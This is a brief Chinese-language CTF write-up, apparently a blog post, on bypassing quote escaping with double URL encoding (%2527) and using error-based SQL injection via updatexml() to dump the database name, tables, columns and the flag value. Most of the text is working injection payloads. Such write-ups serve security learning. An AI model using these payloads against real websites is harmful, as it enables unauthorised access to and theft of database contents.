输入’ 发现’被转义成’/所以用%2527来绕过
因为爆了个错误所以判断有报错注入所以构造报错语句:
%2527 and (updatexml(1,concat(0x7e,(database()),0x7e),1))
然后爆表:
%2527 and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))
发现关键词’flag’所以爆列:
%2527 and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167),0x7e),1))
因为过滤了’所有列名用16进制
然后发现还有个flag所以答案就在这里面跑字段:
%2527 and (updatexml(1,concat(0x7e,(select flag from flag),0x7e),1))
最后跑出flag##
2021-07-31
最新推荐文章于 2022-07-15 16:11:47 发布